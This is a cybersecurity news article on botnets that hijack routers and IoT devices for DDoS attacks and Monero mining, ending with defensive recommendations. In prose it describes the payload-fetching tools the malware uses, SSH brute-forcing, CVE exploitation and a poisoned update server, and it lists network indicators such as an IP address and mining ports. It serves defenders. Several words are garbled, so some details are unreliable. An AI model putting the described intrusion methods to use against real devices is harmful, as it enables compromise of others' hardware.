John
One after another, fresh reports show malware turning company routers, smart gadgets, white-label Linux boxes into tools that smash websites with traffic floods – yet also dig quietly for digital coins behind the scenes.
Not long ago, these hackers hit laptops and desktops; now they crawl straight into networking gear instead. What drives them? Profit. They slip through cracks like outdated firmware, factory-set passwords, gaps tagged with CVE numbers left unfixed too long.
The pace keeps climbing, faster than most IT teams can react. Hidden inside data streams, these attacks do double damage without blinking. Each infected node becomes both hammer and pickaxe in the dark.
The Threat Landscape Moves Closer to Infrastructure
Back in 2025, attacks on network levels three and four jumped nearly 170%, hitting highs close to 30 terabits per second, Radware reported after reviewing yearly threats. Happening alongside: assaults fueled by internet-connected gadgets rose more than 80% within twelve months. One such outbreak, powered by hacked smart devices, unleashed a 5.6-terabit flood near the end of 2024.
That number didn’t last long before bigger waves came through. Security crews aren’t just patching random flare-ups anymore. Instead, they’re up against an organized machine churning out harm by exploiting weak spots in everyday tech across businesses, cities, and even public services.
One router can now serve two criminal goals simultaneously. Instead of picking just one method, hackers load both attack types onto a single infected machine.
A quiet process starts flooding targets with junk traffic, even as another begins digging for digital coins. These blended threats turn basic hardware into dual-purpose tools without extra effort. Running parallel schemes was rare years ago. Now it happens under the surface, steady and unseen.
CondiBot Variant Emerges as Modified Mirai DDoS Tool
That Saturday in early March 2026, a team at Eclypsium spotted something unseen before – two fresh forms of malicious software aimed squarely at Linux-powered networking gear. Their report came out nine days later, on the fifteenth. One of these threats wears familiar traits: it stems from CondiBot, which itself began life as an offshoot of Mirai, yet now operates far outside its initial boundaries.
This version doesn’t stick to one maker’s gear like older CondiBot versions did. Instead, it works as a general-purpose Linux bot that runs on many chip types – ARM through ARM7, plus MIPS and both 32-bit and 64-bit x86 systems – so it fits into all sorts of gadgets worldwide, from home routers to industrial controllers.
Hidden inside is a tag reading “QTXBOT,” something never spotted before in past analyses of Condi threats. That name might mean someone changed the original code in secret, spinning off a new branch without public notice.
What makes this malware stand out? It switches between tools like wget, curl, tftp, and ftpget to fetch its payload, just in case some are missing on minimal systems. After landing, it wakes up quietly, locks down any chance of a restart, then phones home to a remote server for orders.
Instead of sharing space, it wipes out rival bots already running there. Devices made by Fortinet appear on the hit list, according to Eclypsium. Now, both government-backed hackers and profit-driven attackers go after networking gear like this.
Monaco Tool Uses Go for SSH Attacks and Mining Monero
A fresh find within the Eclypsium operation surfaces as Monaco – a tool coded in Go, aimed at scanning SSH channels while mining Monero, created using version 1.24.0 of the language, assembled on February eleventh, two thousand twenty-five. Unlike CondiBot, it veers sharply toward nonstop login-stealing, quietly siphoning digital coins rather than launching large-scale attacks.
Out there, Monaco hunts down open SSH doors online, slipping in with ready-made login combos. Once inside, it slips a copy into /tmp/monaco without pause. Other mining scripts get shut down – no sharing resources. It tweaks processor settings on the fly, squeezing out maximum performance.
Mining kicks off using either XMRig or its cousin XMRigCC, funneling Monero straight to MoneroOcean’s pool. Every working username and password found gets sent home – a whisper over raw TCP – to guide what comes next. That data fuels more break-ins later, feeding the cycle.
Built to run on x86-64, ARM32, ARM64, and both big- and little-endian versions of MIPS, it fits right into servers, home routers, smart gadgets, and Juniper networking hardware. Communication happens through different ports: port 80 handles web files via Apache, while port 3333 routes mining traffic; separate control links run on 12345 and 12346, showing a clear division in how tasks are managed.
Aisuru and Kimwolf Set New Botnet Records
CondiBot and Monaco may be fresh names on the threat list, yet the real shift in botnets came earlier from Aisuru and Kimwolf. That massive 31.4 Tbps DDoS strike? It hit in February 2026, part of a year already packed with near-record attacks. In 2025 alone, the world recorded 47.1 million such disruptions. Growth exploded for Aisuru once hackers slipped into a Totolink router update system – April was the turning point.
They changed where updates downloaded from, quietly swapping it for a harmful script instead. One move, one breach, more than 100,000 machines pulled in during just one push.
Out there among everyday home gadgets, hacked gear piles up – routers by Totolink, T-Mobile, Zyxel, D-Link, Linksys stand listed alongside camera brands like A-MTK, D-Link’s DCS-3411, plus recording units from LILIN, UNIMO, TBK, and Shenzhen TVT.
From these weak spots, Aisuru strikes fast with one clear path at a time, tossing out UDP, TCP, GRE bursts packed in mid-size frames between 540 and 750 bytes – aimed right where speed meets volume. When packet rates climb past 4 billion per second, something gives: line cards inside big network boxes freeze and disconnect from internal grids, dragging unrelated data flows down with them.
Firm networks, along with city and state systems, now host the Kimwolf strain – its presence tucked deep through quiet pathways that change shape without warning. Hidden links flare up where least expected, slipping past standard checks by shifting form mid-transmission.
One common doorway? Unapproved streaming gadgets running Android TV; these small boxes often arrive already compromised or rigged with backdoors wide open. Once plugged into an office setup, they hand over command lines like keys left under the mat, letting intruders crawl unseen across machines.
RondoDox Links Many CVEs to a Single Botnet.
One more thing about RondoDox: it doesn’t just grow; it shifts how threats spread. Not long after FortiGuard Labs looked into the code around June 2025, they spotted a pattern: TBK DVRs and Four-Faith routers were getting hit using flaws tagged CVE-2024-3721 and CVE-2024-12856. Come December that year, everything changed fast – the attack range blew up.
Then, out of nowhere in early 2026, CERT-In sounded an alarm, marking it critical: RondoDox was now exploiting fresh weaknesses, not only in smart gadgets and networking boxes but also in Next.js server functions and content systems.
From gaming platforms like Minecraft and Roblox, disguised traffic slips through filters. Instead of standing out, it blends into the background among services such as Discord or Fortnite. This flow uses HTTP, TCP, plus UDP methods to disrupt targets without clear warning signs.
Unlike older networks built on server farms, one twist lies in home-based IPs turned malicious. Because the source appears to be a regular internet user, defenses often fail to respond. Infected machines also run hidden mining software, backdoor programs, and modified Mirai code. Cleaning up requires tackling several threats at once, each of which hides behind everyday online behavior.
Prometei Revives Monero Mining Efforts
A fresh surge in Prometei attacks caught Unit 42’s attention at Palo Alto Networks in March 2025. Though new families emerge, older dangers still carry weight. The Linux version of this malware ramped up its operations sharply. Remote control becomes possible once systems are infected. Mining Monero is one goal. Stealing login details.
Attackers lean on shared infrastructure. That setup helps them stay hidden inside corporate networks for months. Persistence matters more than speed here.
Hidden inside networks, Prometei creeps back like many before it. Not loud like ransomware that blocks data and shouts for attention. Instead, slow theft happens – power fades, processors strain under silent load. Months pass untouched if systems lack deep inspection tools. Profits pile up far away, while machines hum along unaware.
Method,s Mov, es and Avoidance
Every known campaign shares certain methods. Not just one but often multiple weak spots get used right away – like factory passwords, outdated system software, leftover admin tools online. Instead of relying on single tools, hackers switch between small programs so they keep working even when basic systems are wiped clean.
What sticks around? Changes made deep inside device code – the kind that stays after restarts, fresh installs, sometimes even new storage drives. Once networks fall, those machines turn into hidden bases. From there, attackers spread quietly through separate network zones, linking office tech with industrial gear to spy or strike later.
Mitigation Recommendations
- Security teams should prioritize the following defensive measures against these active campaigns:
- Fresh updates on every gadget’s core software help shut down weak spots that hackers like RondoDox love to sneak through. Old code in border gateways, recorders, and internet-linked lenses often opens doors that should remain closed. Check each box carefully, then swap out outdated layers before trouble finds its way in. Hidden gaps patched today stop attacks tomorrow – especially those favored by Aisuru and CondiBot crews.
- Start by removing preset login pairs from every device exposed online. Instead of relying on passwords alone, shift toward using SSH keys for access control. This move weakens automated probing attempts seen in attacks like those originating from Monaco. Each system should reject factory-set credentials immediately after deployment. Strengthen defenses by ensuring only authorized key exchanges grant entry. Automated scans often target weak logins – eliminate that opening.
- Finding odd behavior deep in device software: Use systems that spot strange actions beneath the operating system, where regular security tools often miss the.m
- Watch outgoing data flows closely. Connections appearing out of nowhere toward MoneroOcean might signal something off. Traffic to certain IP blocks, such as 8.222.206.6, raises questions. Ports 3333, 12345, or 12346 acting strangely could mean trouble. These signs were spotted within Monaco’s systems. Unexpected patterns here deserve a second look.
- Start by splitting up the network. Devices like smart gadgets sit apart from business systems. This separation blocks attackers such as Kimwolf and Aisuru from sliding sideways across machines. When one part gets hit, the rest stays shielded. Think of it as closed doors between rooms. Breaches find fewer paths forward. Hackers can’t easily jump from weak endpoints into core areas. Keeping zones separate slows them down. Security improves without extra tools. The layout itself becomes a barrier. Limits spread when threats sneak insid.e
- Sing with Flowspec, plug in DDoS defenses that respond fast when attacks hit. Instead of waiting, these tools block malicious traffic using rules built into routing systems. Detection layers must already be running, watching every packet shape and size. Classification kicks in right after, sorting noise from real threats based on live patterns pulled from known botnets. Traceback features leave digital breadcrumbs that allow sources to be pinned later. Testing happens often, not just once – each round uses fresh attack data to check if everything still holds
Out in the open, these efforts stretch wide, built tall with many layers, their goals split between reach and profit. What stands clear now in security work? The outer line isn’t just a wall anymore – it’s where clashes happen first. Devices left alone, without eyes on them, quietly help those who break in.
Site: thecybrdef.com
What makes CondiBot risky is how it runs on many chip types – ARM, MIPS, x86, and x86_64 – hitting nearly every Linux-powered gadget. Instead of sharing space, it wipes out other malware already present, taking full hold. Alongside comes Monaco, slipping in through weak SSH logins. Once inside, it works two angles at once: cracking passwords further while firing up XMRig to dig for Monero coins. One machine, two streams of gain – that’s the pattern. Control spreads fast when both tools team up across devices.
